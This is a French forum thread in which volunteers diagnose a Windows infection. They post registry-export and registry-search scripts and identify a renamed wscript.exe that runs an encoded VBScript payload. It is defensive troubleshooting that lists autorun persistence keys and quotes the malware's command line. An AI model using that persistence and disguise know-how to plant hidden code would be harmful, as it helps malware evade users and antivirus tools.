    • Les PUP/LPIs (programmes potentiellement indésirables)
    • Les toolbar (barres d'outil greffées au navigateur)
    • Les hijacker (détournement de la page de démarrage)



    Adwcleaner dispose d'un mode recherche et d'un mode suppression.
    Si vous avez fait le mode recherche il faut alors passer au mode Suppression
    Après vous allez redémarrer le PC et un autre Rapport va être ouvert ; Alors vous pouvez poster ce dernier Rapport
    Donc télécharge AdwCleaner ( d'Xplode ) sur ton bureau.

    Répondre avec citation Répondre avec citation   0  0
  5. 12/09/2013, 22h43 #5
    ledouxxx
    ledouxxx est déconnecté
    Futur Membre du Club
    Homme Profil pro
    Étudiant
    Inscrit en
    Août 2013
    Messages
    10
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : Cameroun

    Informations professionnelles :
    Activité : Étudiant
    Secteur : Santé

    Informations forums :
    Inscription : Août 2013
    Messages : 10
    Points : 5
    Points
    5
    Par défaut
    Salut chers tous, désolé d'etre un peu lent à la reponse.
    j'ai téléchargé malwarebites anti-malware et adwcleaner que j'ai utilisé, et dans le rapport, rien de suspect, et mon mal persiste néanmoins. j'attends de nouvelles solutions svp. merci pour tout ce que vous faites.
    Répondre avec citation Répondre avec citation   0  0
  6. 13/09/2013, 02h31 #6
    hackoofr
    hackoofr est déconnecté
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 840
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 840
    Points : 9 225
    Points
    9 225
    Par défaut

    Essayez SpyBot Search & Destroy
    Répondre avec citation Répondre avec citation   0  0
  7. 13/09/2013, 12h07 #7
    BenjGe
    BenjGe est déconnecté
    Membre expérimenté
    Homme Profil pro
    Ingénieur systèmes et réseaux
    Inscrit en
    Avril 2008
    Messages
    875
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Yvelines (Île de France)

    Informations professionnelles :
    Activité : Ingénieur systèmes et réseaux
    Secteur : Conseil

    Informations forums :
    Inscription : Avril 2008
    Messages : 875
    Points : 1 394
    Points
    1 394
    Par défaut
    peux tu nous donner le contenu des clés:
    HKLM\software\microsoft\windows nt\current version\winlogon
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
    HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\
    HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Scripts\Logon
    HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Scripts\Logon
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
    HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
    HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserShell Folders
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
    HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\Shell


    Pour les services:
    HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Services
    ou alors publie une copie d'écran de l'onglet services de l'utilitaire msconfig (services non microsoft)

    et le contenu du dossier démarrage (tous les programmes/démarrage)


    PS: je sais c'est lourd mais en gros tu as un programme sur ton ordi qui n'est peut être pas identifié comme virus ou malware


    PPS: ton programme n'a pas été nettoyé. Il y a au moins 2 processus qui me paraissent dangereux dans le rapport que tu as posté:
    systemprotection.exe
    ListProcessCmdLine.vbs
    Répondre avec citation Répondre avec citation   1  0
  8. 13/09/2013, 12h22 #8
    hackoofr
    hackoofr est déconnecté
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 840
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 840
    Points : 9 225
    Points
    9 225
    Par défaut
    Citation Envoyé par Benjîle Voir le message
    PS: je sais c'est lourd mais en gros tu as un programme sur ton ordi qui n'est peut être pas identifié comme virus ou malware
    et pour cette remarque
    Peut-être je vais penser à écrire un Vbscript qui va automatiser cette tâche si je trouve un peu le temps j'espère
    Répondre avec citation Répondre avec citation   0  0
  9. 13/09/2013, 12h24 #9
    BenjGe
    BenjGe est déconnecté
    Membre expérimenté
    Homme Profil pro
    Ingénieur systèmes et réseaux
    Inscrit en
    Avril 2008
    Messages
    875
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Yvelines (Île de France)

    Informations professionnelles :
    Activité : Ingénieur systèmes et réseaux
    Secteur : Conseil

    Informations forums :
    Inscription : Avril 2008
    Messages : 875
    Points : 1 394
    Points
    1 394
    Par défaut
    commence par msconfig je pense que le problème peut être réglé par là.
    Désactive les services systemprotection, et kms server
    Répondre avec citation Répondre avec citation   0  0
  10. 13/09/2013, 12h41 #10
    BenjGe
    BenjGe est déconnecté
    Membre expérimenté
    Homme Profil pro
    Ingénieur systèmes et réseaux
    Inscrit en
    Avril 2008
    Messages
    875
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Localisation : France, Yvelines (Île de France)

    Informations professionnelles :
    Activité : Ingénieur systèmes et réseaux
    Secteur : Conseil

    Informations forums :
    Inscription : Avril 2008
    Messages : 875
    Points : 1 394
    Points
    1 394
    Par défaut
    voilà le script à exécuter:

    poster en PJ le fichier c:\cle\sortie.txt

    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    mkdir c:\cle

regedit /e c:\cle\outputwinlogon.reg HKEY_LOCAL_MACHINE\software\microsoft\windows nt\current version\winlogon
regedit /e c:\cle\outputrun.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
regedit /e c:\cle\outputrunonce.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce
regedit /e c:\cle\outputrunservice.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServices
regedit /e c:\cle\outputrunservicesonce.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
regedit /e c:\cle\outputuserrun.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run
regedit /e c:\cle\outputuserrunonce.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Runonce
regedit /e c:\cle\outputuserrunservice.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServices
regedit /e c:\cle\outputuserrunserviceonce.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunServicesOnce
regedit /e c:\cle\output.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce\Setup\
regedit /e c:\cle\outputlogon.reg HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Scripts\Logon
regedit /e c:\cle\outputuserlogon.reg HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Scripts\Logon
regedit /e c:\cle\outputexplorershellfolders.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
regedit /e c:\cle\outputuserexplorer.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
regedit /e c:\cle\outputshellfolders.reg HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders
regedit /e c:\cle\outputusershellfolders.reg HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\UserShell Folders
regedit /e c:\cle\outputwinlogonshell.reg HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell
regedit /e c:\cle\outputsystemshell.reg HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system\Shell
regedit /e c:\cle\outputservices.reg HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services

type c:\cle\*.reg > c:\cle\sortie.txt

del c:\cle\*.reg
    à mettre dans un fichier texte (bloc note), l'enregistrer sous le nom exporte.cmd et l'exécuter


    @hackoofr, je ne suis pas sûr de bien comprendre votre remarque masi en gros comprendre le système windows est bien plus efficace que d'utiliser 40 utilitaires que l'on ne comprend pas et qui ne font pas le travail
    Si un jour un de vos serveurs se fait infecter, croyez moi vous ne lancerez pas ces utilitaires...
    Répondre avec citation Répondre avec citation   1  0
  11. 14/09/2013, 09h32 #11
    hackoofr
    hackoofr est déconnecté
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 840
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 840
    Points : 9 225
    Points
    9 225
    Par défaut
    Citation Envoyé par Benjîle Voir le message
    ton programme n'a pas été nettoyé. Il y a au moins 2 processus qui me paraissent dangereux dans le rapport que tu as posté:
    systemprotection.exe
    ListProcessCmdLine.vbs
    A propos de ListProcessCmdLine.vbs c'est mon script pour afficher tous les processus en cours d'exécution et les éléments à démarrage automatique. Donc c'est processus fiable et sans crainte
    Par contre systemprotection.exe c'est exactement le Virus qu'on cherche c'est un Vbscript Encodé de type VBE.
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    Numéro PID = 4760
Nom du Processus = SystemProtection.exe
Ligne de Commande = "C:\system32\SystemProtection.exe"  /e:VBScript.Encode "C:\system32\blood.dat
    Si tu peux m'editer le fichier blood.dat et poster son contenu
    Répondre avec citation Répondre avec citation   0  0
  12. 14/09/2013, 18h16 #12
    hackoofr
    hackoofr est déconnecté
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 840
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 840
    Points : 9 225
    Points
    9 225
    Par défaut

    Je vous explique les choses comment elle se déroule :
    • Le fichier systemprotection.exe = c'est le Moteur du script VBS et VBE Wscript.exe (En comparant la taille systemprotection.exe=wscript.exe)
    • le créateur du virus a du le renommer pour camoufler les choses
    • Le fichier blood.dat : C'est le code lui même mais il est encodé (crypté) c'est de type VBE = VBscript Encodé pour qu'il soit difficile à le détecter par les Antivirus.

    Voila ce que je vous demande de faire : Copier et coller ce code dans votre notepad et enregistrer-le sous le nom FindBlood.bat
    Alors après son exécution il va vous ouvrir un fichier nommé LogBlood.txt c'est le code" crypté" du virus lui même. alors Zipper ce fichier et me l'envoyer par pièce jointe avec ceci :
    et m'envoyer le lien et les identifiants par messagerie privé.
    Je vais essayer de le décoder
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    @echo off
Type C:\system32\blood.dat > LogBlood.txt
Start LogBlood.txt
    Répondre avec citation Répondre avec citation   0  0
  13. 15/09/2013, 00h53 #13
    hackoofr
    hackoofr est déconnecté
    Expert éminent
    Avatar de hackoofr
    Homme Profil pro
    Enseignant
    Inscrit en
    Juin 2009
    Messages
    3 840
    Détails du profil
    Informations personnelles :
    Sexe : Homme
    Âge : 49
    Localisation : Tunisie

    Informations professionnelles :
    Activité : Enseignant

    Informations forums :
    Inscription : Juin 2009
    Messages : 3 840
    Points : 9 225
    Points
    9 225
    Par défaut [VBS] RegSearch.vbs : Rechercher dans votre base de Registre et trouver toutes les instances du mot saisi

    Voila j'ai un peu modifié et traduit en français ce Vbscript (Version Originale en anglais par © Bill James)
    Description du Script :
    • Rechercher dans votre base de Registre et trouver toutes les instances du mot saisi.
    • Possibilité de sauvegarder le résultat de recherche avec WordPad.
    • On peut aussi sauvegarder le fichier avec l'extension ".reg", pour l'utiliser afin de restaurer chaque changement de la base de registre que vous faites pour ces valeurs.
    • Ajout d'une barre de Progression en Vbscript + HTA par © Hackoo le 14/09/2013

    Copier et coller ce code et enregistrer-le sous le nom RegSearch.vbs, puis exécuter-le et poster son contenu.
    J'ai prédéfini le mot à rechercher comme systemprotection.exe
    Code : Sélectionner tout - Visualiser dans une fenêtre à part
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
    39
    40
    41
    42
    43
    44
    45
    46
    47
    48
    49
    50
    51
    52
    53
    54
    55
    56
    57
    58
    59
    60
    61
    62
    63
    64
    65
    66
    67
    68
    69
    70
    71
    72
    73
    74
    75
    76
    77
    78
    79
    80
    81
    82
    83
    84
    85
    86
    87
    88
    89
    90
    91
    92
    93
    94
    95
    96
    97
    98
    99
    100
    101
    102
    103
    104
    105
    106
    107
    108
    109
    110
    111
    112
    113
    114
    115
    116
    117
    118
    119
    120
    121
    122
    123
    124
    125
    126
    127
    128
    129
    130
    131
    132
    133
    134
    135
    136
    137
    138
    139
    140
    141
    142
    143
    144
    145
    146
    147
    148
    149
    150
    151
    152
    153
    154
    155
    156
    157
    158
    159
    160
    161
    162
    163
    164
    165
    166
    167
    168
    169
    170
    171
    172
    173
    174
    175
    176
    177
    178
    179
    180
    'Rechercher dans votre base de Registre et trouver toutes les instances du mot saisi.
'Possibilité de sauvegarder le résultat de recherche avec WordPad.
'On peut aussi sauvegarder le fichier avec l'extension ".reg", pour l'utiliser afin de restaurer chaque changement de la base de registre que vous faites pour ces valeurs.
'Ajout d'une barre de Progression en Vbscript + HTA par © Hackoo le 14/09/2013 
Option Explicit
Dim oExec,ws,Temp,Titre,MsgAttente
Set ws = CreateObject("wscript.Shell") 
Temp = WS.ExpandEnvironmentStrings("%Temp%")

Sub CreateProgressBar(Titre,MsgAttente)
	Dim ws,fso,f,f2,ts,ts2,Ligne,i,fread,LireTout,NbLigneTotal,Temp,PathOutPutHTML,fhta,oExec
	Set ws = CreateObject("wscript.Shell")
	Set fso = CreateObject("Scripting.FileSystemObject")
	Set f = fso.GetFile(WScript.ScriptFullName)
	Set ts = f.OpenAsTextStream(1,-2)
	Set fread = Fso.OpenTextFile(f,1)
	LireTout = fread.ReadAll
	NbLigneTotal = fread.Line 
	Temp = WS.ExpandEnvironmentStrings("%Temp%")
	PathOutPutHTML = Temp & "\Barre.hta"
	Set fhta = fso.OpenTextFile(PathOutPutHTML,2,True)
	fso.CreateTextFile Temp & "\loader.gif"
	Set f2 = fso.GetFile(Temp & "\loader.gif")
	Set ts2 = f2.OpenAsTextStream(2,-2)
	for i=1 to NbLigneTotal - 1
		ts.skipline
	Next
	Do
		Ligne = ts.readline
		For i=2 to Len(Ligne) step 2
			ts2.write chr( "&h" & mid(Ligne,i,2))
		Next
	loop until ts.AtEndOfStream
	ts.Close
	ts2.Close
	fhta.WriteLine "<HTML>"
	fhta.WriteLine "<HEAD>" 
	fhta.WriteLine "<Title>" & Titre & "</Title>" 
	fhta.WriteLine "<HTA:APPLICATION"
	fhta.WriteLine "ICON = ""Regedit.exe"" "
	fhta.WriteLine "BORDER=""THIN"" "
	fhta.WriteLine "INNERBORDER=""NO"" "
	fhta.WriteLine "MAXIMIZEBUTTON=""NO"" "
	fhta.WriteLine "MINIMIZEBUTTON=""NO"" "
	fhta.WriteLine "SCROLL=""NO"" "
	fhta.WriteLine "SYSMENU=""NO"" "
	fhta.WriteLine "SELECTION=""NO"" " 
	fhta.WriteLine "SINGLEINSTANCE=""YES"">"
	fhta.WriteLine "</HEAD>" 
	fhta.WriteLine "<BODY text=""white""><CENTER><DIV><SPAN ID=""ProgressBar""></SPAN>"
	fhta.WriteLine "<span><marquee DIRECTION=""LEFT"" SCROLLAMOUNT=""3"" BEHAVIOR=ALTERNATE><font face=""Comic sans MS"">" & MsgAttente &" "& Titre & "</font></marquee></span></DIV></CENTER></BODY></HTML>"
	fhta.WriteLine "<SCRIPT LANGUAGE=""VBScript""> "
	fhta.WriteLine "Set ws = CreateObject(""wscript.Shell"")"
	fhta.WriteLine "Temp = WS.ExpandEnvironmentStrings(""%Temp%"")"
	fhta.WriteLine "Sub window_onload()"
	fhta.WriteLine "    CenterWindow 320,90"
	fhta.WriteLine "    Self.document.bgColor = ""Red"" "
	fhta.WriteLine "    image = ""<center><img src= "& Temp & "\loader.gif></center>"" "
	fhta.WriteLine "    ProgressBar.InnerHTML = image"
	fhta.WriteLine " End Sub"
	fhta.WriteLine " Sub CenterWindow(x,y)"
	fhta.WriteLine "    Dim iLeft,itop"
	fhta.WriteLine "    window.resizeTo x,y"
	fhta.WriteLine "    iLeft = window.screen.availWidth/2 - x/2"
	fhta.WriteLine "    itop = window.screen.availHeight/2 - y/2"
	fhta.WriteLine "    window.moveTo ileft,itop"
	fhta.WriteLine "End Sub"
	fhta.WriteLine "</script>"
End Sub

Sub LancerProgressBar()
	Set oExec = Ws.Exec("mshta.exe " & Temp & "\Barre.hta")'Lançer la barre de Progression
End Sub

Sub FermerProgressBar()
	oExec.Terminate
End Sub
'***************************************************Programme Principal****************************************************************************
'--------------------------------RegSrch-------------------------------------------------------------------------------------------
'RegSrch.vbs - Search Registry for input string and display results.
'© Bill James - wgjames@mvps.org
' revised 20 Apr 2001 (parses regfile ~3X faster)
' revised 13 Dec 2001 (added Regedit command line switch for Win2K/WindXP)
'----------------------------------------------------------------------------------------------------------------------------------
Dim oWS : Set oWS = CreateObject("WScript.Shell")
Dim oFSO : Set oFSO = CreateObject("Scripting.FileSystemObject")
Dim sSearchFor
sSearchFor = InputBox("Ce programme va rechercher dans votre base de registre et trouver toutes " & _
"les instances du mot saisi." & vbcrlf & vbcrlf & _
"Cette recherche peut prendre plusieurs minutes, alors il faut être patient." & _
vbcrlf & vbcrlf & "Entrez le mot à rechercher " & _
"cliquer OK...", WScript.ScriptName & " " & Chr(169) & " Hackoo Crackoo","systemprotection.exe")
If sSearchFor = "" Then Cleanup()
Titre = "Recherche dans la base de registre © Hackoo"
MsgAttente = "Veuillez patienter... La Recherche du mot "& DblQuote(sSearchFor) &" est en cours..."
Call CreateProgressBar(Titre,MsgAttente)
Call LancerProgressBar()
Dim StartTime : StartTime = Timer
Dim sRegTmp, sOutTmp, eRegLine, iCnt, sRegKey, aRegFileLines
sRegTmp = oWS.Environment("Process")("Temp") & "\RegTmp.tmp "
sOutTmp = oWS.Environment("Process")("Temp") & "\sOutTmp" & _
Hour(Now) & Minute(Now) & Second(Now) & ".tmp "
oWS.Run "regedit /e /a " & sRegTmp, , True '/a enables export as Ansi for WinXP
With oFSO.OpenTextFile(sOutTmp, 8, True)
	.WriteLine("REGEDIT4" & vbcrlf & "; " & WScript.ScriptName & " " & _
	Chr(169) & " Hackoo Crackoo" & vbcrlf & vbcrlf & "; Résultat de la Recherche pour le " & _
	"mot " & Chr(34) & sSearchFor & Chr(34) & " " & Now & _
	vbcrlf & vbcrlf & "; NOTE: Ce fichier va être supprimer si vous ne le sauvegarder pas avec " & _
	"WordPad." & vbcrlf & "; Vous avez interêt de le sauvgarder vers un nouveau " & _
	"emplaçement si vous-voulez l'utiliser aprés." & vbcrlf & "; (si " & _
	"vous sauvegarder le fichier avec l'extension .reg , Vous Pouvez l'utiliser pour restaurer " & _
	"afin de restaurer chaque changement de la base de registre que vous faites pour ces valeurs..)" & vbcrlf)
'---------------------------------------------------------------------------------------------------------------------------------------------------------------
'ForReading 1 Ouvre un fichier en lecture seule. Vous ne pouvez écrire dans ce fichier.
'ForWriting 2 Ouvre un fichier en mode écriture. Si un fichier portant le même nom existe, son contenu antérieur est écrasé.
'ForAppending 8 Ouvre un fichier et écrit à  la fin de celui- ci.
'TristateUseDefault -2 Ouvre le fichier en utilisant le paramètre système par défaut.
'TristateTrue -1 Ouvre le fichier au format Unicode.
'TristateFalse 0 Ouvre le fichier au format ASCII.
'OpenAsTextStream(1, 0) donc est ouvert en lecture seule et au format ASCII
'-------------------------------------------------------------------------------------------------------------------------------------------------------------
	With oFSO.GetFile(sRegTmp)
		aRegFileLines = Split(.OpenAsTextStream(1,0).Read(.Size), vbcrlf)
	End With
'oWS.Run "WordPad " & sRegTmp, 3, True
	oFSO.DeleteFile(sRegTmp)
'-----------------------------------------------------------------------------------------------------------------------------------------------------------------
'Exemple comment utiliser la Fonction Instr
'Dim SearchString, SearchChar, MyPos
'SearchString ="XXpXXpXXPXXP" ' Chaîne dans laquelle rechercher.
'SearchChar = "P" ' Recherche "P".
'MyPos = Instr(4, SearchString, SearchChar, 1) ' Comparaison textuelle commençant à  la position 4. Renvoie 6.
'MyPos = Instr(SearchString, SearchChar) ' La comparaison est binaire par défaut (le dernier argument est omis). Renvoie 9.
'MyPos = Instr(1, SearchString, "W") ' Comparaison binaire commençant à  la position 1. Renvoie 0 ("W" est introuvable).
'-----------------------------------------------------------------------------------------------------------------------------------------------------------------
	For Each eRegLine in aRegFileLines
		If InStr(1, eRegLine, "[", 1) > 0 Then sRegKey = eRegLine
		If InStr(1, eRegLine, sSearchFor, 1) > 0 Then
			If sRegKey <> eRegLine Then
				.WriteLine(vbcrlf & sRegKey) & vbcrlf & eRegLine
			Else
				.WriteLine(vbcrlf & sRegKey)
			End If
			iCnt = iCnt + 1
		End If
	Next
	Erase aRegFileLines
	If iCnt < 1 Then
'Fermeture de la fenêtre d'attente (La barre de progression)
		Call FermerProgressBar()
		oWS.Popup "Recherche complétée dans " & FormatNumber(Timer - StartTime, 0) & " seconds." & _
		vbcrlf & vbcrlf & "Pas instances de " & chr(34) & sSearchFor & chr(34) & _
		" Trouvé.",, WScript.ScriptName & " " & Chr(169) & " Hackoo Crackoo",48
		.Close
		oFSO.DeleteFile(sOutTmp)
		Cleanup()
	End If
	.Close
End With
'Fermeture de la fenêtre d'attente (La barre de progression)
Call FermerProgressBar()
oWS.Popup "Recherche complétée dans " & FormatNumber(Timer - StartTime, 0) & " seconds." & _
vbcrlf & vbcrlf & iCnt & " instances de " & chr(34) & sSearchFor & chr(34) & _
" Trouvé." & vbcrlf & vbcrlf & "Cliquer sur OK pour ouvrir les Résultas dans WordPad.",, _
WScript.ScriptName & " " & Chr(169) & " Hackoo Crackoo",64
oWS.Run "WordPad " & sOutTmp, 3, True
oFSO.DeleteFile(sOutTmp) 

Sub Cleanup()
	Set oWS = Nothing
	Set oFSO = Nothing
	WScript.Quit
End Sub
'**********************************************************************************************
'Fonction pour ajouter les doubles quotes dans une variable
Function DblQuote(Str)
	DblQuote = Chr(34) & Str & Chr(34)
End Function
'****************************************************Fin du Programme Principal***********************************************************************
'47494638396180000F00F20000F3D9DDF15279F2BBC6F2B0BEF17492F1527900000000000021FF0B4E45545343415045322E30030100000021FE1A43726561746564207769746820616A61786C6F61642E696E666F0021F904090A0000002C0000000080000F000003E708B20BFEAC3D17C5A4F1AA7CABF61D3781A3089918B391AB5949A9FB96EC6B9DF58CCBB9DDF340D54E1823B68C365A107664FA744527B4798B56A94AE4343994FE9E57AE35EB5D86B7E86F590B5EBBCF6AB8992C67CFBB3EBA1EBF1FF3FF7E81587862838285886977878A760C039091031392919495930F98990E9B97959F92A1969A98A390A79C009B9EA5A0AEA2B0A49DA6B2A8B6AAADB4AFBBB1BDB3ABACBCC1C3BAC4BEC7C0C6CBB5BFB7CEB9CDC9C2A9D5B8D6D0D8D3D1C5D2CCC2CADEE2DDE4C8DFE6E3E8E5E0DAE7E1EBCFDBEDE9EFEAA2C3BF1AF8C9FAC8F917FB02FAE3077020A8040021F904090A0000002C0000000080000F000003FF08B40BFE22C607A5A0CE5EAC31E89CE581145949A318A24C5B6A5B06BF261C7FF3A9CA75CEEFB89EA6C5A0016D46944EF963068FBEA713B99C5405C4C635696D76A55FAAF7260693A3655B96C03D0BA1EF297A1E0FD32DEBB67ECB1FEFFD7D667F667981697772756E708C898D11858092828688768A83871A059C9D051403A1A203A0A3A1A5A6A8A3AAA2ACA70FA6AF0EB1A4B0B1AEB5B3B19E9DB8BEB6A9C0ABC2ADC4B200B4BFBAC1CBC3CDA2BC9CCAC8B7C6B9D4CCD8CEDAC5CFC7C9D6D3B4D19FE1E6DED7E0E8E2D5EBE7DCDFBBD1ECD9EAF0E9EDF7F4DBF6FDF2BCFBBAE97BE7AF5EBE82FC0EDE028821DB330F0EB941DCF6B021458916055664052001010021F904090A0000002C0000000080000F000003FF08B40BFEAC3D276A9DD40A0CF4C61E17829A58929699A257C44CAE948DF359AFF7F5787AFEF913DEAFC30BF2620458CC482336854C9B530ADD15ADCFAB0FA974457153701588A56AC33DF470ACE6429665F1994D9FDBB378B3C7EDE0ABBF697579728381777A1A7E7E8288848D86856B878E168A7064987F71908F9291809E1A05A3A40513A5A41303ABAC03AAADABAFB0B2ADB4ACB6B10FB0B90EBBAEBABBB803A8A3A7C4C2C8C0B3CAB5CCB7CEBC00BEC9BDC1D0C3C70FC4A6D7D4D2D6D5CBE1CDE3CFE5D1D3DDD7DBC6A8DEE9E7BFF1EFE0DFE2F6E4F8E6FAABECDAD9F3D4051CC84F5E417AF7E015F4E780E141810F092A9C588F62C260EE3064B4C5E10F5EB98EF93E62F0A80FE43E911C13000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C97422E70BF4BE9EC085A3576AE73791A05949D43BBDD613AADDBDEA368FF939D64F1834F542B4990CB21C1A9DA8E3B31885E26E2269957ABD2599156558DB25627766E0999CB5B6B9826F6C3C8FA0A76BF77D9B87EFCB785E4D0A83727E6C7F6F7D8B6A8D6948859174877A88969598949A58869D838C8F81A17C8EA2A61A05A9AA0513ABAAADAEAC0F03B4B50313B6B5B8B9B7B3BCBBB9C0B6C2BABEC1C6B6B1B20ECAB0AEC4B4D0BD0EBCD300D5D2D9C8C5D4BFDBB4CD0FE1CCB1DADDC7E7C3DFD6D8EBE6D7DEE9B5E300F4F4EDF2D1EEFBF9ECF1F0E800AAEB67AF9C3883FDDEE113C88DA1BE84FC1CFACB55F0D9418B10334A54F86F1AA1C78EBF305E4CC541A43C0E014F5E48C910E5C06D2E1B9E4C000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F102C1B9EEDE050A1F587667388D2959495835BD16F4AE23F9E4BAC3E3AC5D0E6812067D39DAEC66933533C622F2B8194651575595FACB0A944FC6D219834EA55B74F78C656BD7E9769C032E8BC33005D3DD9BF7E180567C44723C757A6488668A77835E846F827E907F92867B8C798787815C969F9EA16A49989BA5989DA3A285A0AAAE1D05B1B20513B3B2B5B6B40FB9BA0E03BFC00313C1C0C3C4C20FC7C8BEC7C6C4CEC1D0C0BCB8B6D5B3D7B7C9CDDBCFDDD1DFC5E1BFD2E4E3CB00CAD4BBB9D9B1EEBDE9DCCCDEF4E0F6E2F8E6FAE8CAE503EB1C04043070A0BF73FF12225CC8EF5FC176ECAC45C4C6505E3D8BF730E6D3B88F2B63BF791E1F4A140891E4488F0A1B563CA8B225CA9326DF5D804990A2340D17F1E1CCA8F3424E8D3B8B25000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7C85F7DA07766258929F99A2602561D5E45A902BDB8FB83AFAC8F7939E2008CC157FBAD92D5663C2384F0651373D21AD006175973D7693B8E86BE32443CD5223558DD5B2B9EE2BBCA76C9EEB625A7EEBFBB6BD717E736B721E786863878A61827D818F8091848D028B6596778C90939B7F9C922298697B76A3887A947C436F8EA0839E2205B2B30513B4B3B6B7B50FBABB0EBD1303C2C303C1C4C2C6C7C9C4CBC3CDC80FC7C2C0BCBAB9B7D7B4D9B8D1D2CFC5DDCAE1CCE3CEE5D00ED203D4BFD6D5D8EFDAF1DCE9DEE7E0F5E2F9E4FBE6FDE800D4B10330B0A0BB76F0FEE10B684FE1B787F7BE194C48F060458A03D5417418B12D23478513E52114799164C6860CF5A5E4B7D25F4B801A23521CE96B9E8699256BF6D3A072E7859E2D79B2DC99000021F904090A0000002C0000000080000F000003FF08B40BFEAC3D17C9A4F1AA7CAB1620F885C2189AE245962AB9795065C53056BF9C9D036BEAF4AC5F6F02240E1F40D94CC798289D32E8ED893C0A57466C557B756D4954A644BCC43569BB30CFBAE6B6BDDDD3571E07A9EF51F4992CDD15E73E6F7482817F75027853797C7A63668E8684419259709480888B8F6589699A6A91A16CA26E499FA78AA99E37A496AD83AF2005B3B40513B5B4B7B8B60FBBBC0EBEBAB81303C5C603C4C7C5C9CACCC7CEC6D0C5C1BDBBC2B5D7B9D5C3DBD80FCACBDFE0D2C8E2CDE6CFE8C6D4C0D6DDDAEDDCF1DEF3F000E0E50EF8E4FCEAE1FAE0D8011048D05DBD59D910FACB776FDCC27E00CF453C5650DE4083172D56A4D7503362C77413A33D1C19721AC68DF6502A3CF8EBA3C8920CF79174F98F26328BF534E0CCB8F29D4